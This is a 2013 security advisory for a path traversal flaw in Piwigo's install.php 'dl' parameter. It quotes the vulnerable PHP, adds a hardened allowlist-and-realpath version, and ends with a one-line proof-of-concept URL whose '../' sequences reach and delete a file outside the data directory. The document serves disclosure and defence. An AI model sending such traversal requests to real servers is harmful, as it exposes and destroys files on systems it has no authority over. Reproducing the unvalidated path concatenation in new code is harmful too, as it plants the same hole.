Piwigo is a photo gallery script written in PHP.

Piwigo 2.4.6 and other versions do not properly validate the value of the 'dl' parameter of the install.php script. The implementation contains a security vulnerability that an attacker can exploit to view arbitrary files on the affected machine and to delete arbitrary files within the context of the affected application.
====================================================================
/install.php (lines 113-124):
-------------

```php
if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
{
  $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
  header('Cache-Control: no-cache, must-revalidate');
  header('Pragma: no-cache');
  header('Content-Disposition: attachment; filename="database.inc.php"');
  header('Content-Transfer-Encoding: binary');
  header('Content-Length: '.filesize($filename));
  echo file_get_contents($filename);
  unlink($filename);
  exit();
}
```
====================================================================
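The root cause is that the raw `$_GET['dl']` value is concatenated into a filesystem path, so `../` sequences walk out of the data directory before the file is read and then unlinked. As an added example (not Piwigo's code and not the vendor's patch), one way to harden this handler: accept only an allowlisted value for `dl` (the single expected name is inferred from the `Content-Disposition` header in the snippet) and verify that the canonicalised path still lies inside the data directory before serving or deleting anything. `PHPWG_ROOT_PATH` and `$conf['data_location']` are assumed to be defined as in install.php.

```php
<?php
// Added hardening example for the install.php 'dl' handler above.
// Not Piwigo's code and not the vendor's patch; PHPWG_ROOT_PATH and
// $conf['data_location'] are assumed to be defined as in install.php.

// The only file this handler is meant to hand out, inferred from the
// Content-Disposition header in the original snippet.
$allowed_dl = array('database.inc.php');

function resolve_download($dl, $data_dir, array $allowed)
{
    // 1. Exact allowlist match: no '../', slashes or null bytes can get in.
    if (!is_string($dl) || !in_array($dl, $allowed, true)) {
        return false;
    }
    // 2. Canonicalise and require the result to stay inside $data_dir, so a
    //    symlink or an unusual data_location setting cannot escape it either.
    $base = realpath($data_dir);
    $file = realpath($data_dir . '/pwg_' . $dl);
    if ($base === false || $file === false || !is_file($file)) {
        return false;
    }
    if (strpos($file, rtrim($base, '/\\') . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $file;
}

if (!empty($_GET['dl'])) {
    $data_dir = PHPWG_ROOT_PATH . $conf['data_location'];
    $filename = resolve_download($_GET['dl'], $data_dir, $allowed_dl);
    if ($filename === false) {
        header('HTTP/1.1 400 Bad Request');
        exit();
    }
    header('Cache-Control: no-cache, must-revalidate');
    header('Pragma: no-cache');
    header('Content-Disposition: attachment; filename="database.inc.php"');
    header('Content-Transfer-Encoding: binary');
    header('Content-Length: ' . filesize($filename));
    readfile($filename);
    unlink($filename);  // only ever reached for the allowlisted, contained file
    exit();
}
```

A request such as the one in the PoC below then fails the allowlist check and never reaches `file_exists`, `readfile` or `unlink`.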
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Apache 2.4.2 (Win32)
PHP 5.4.4
MySQL 5.5.25a

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience

Advisory ID: ZSL-2013-5127
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
Vendor Patch: http://piwigo.org/bugs/view.php?id=2843

15.02.2013

--
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt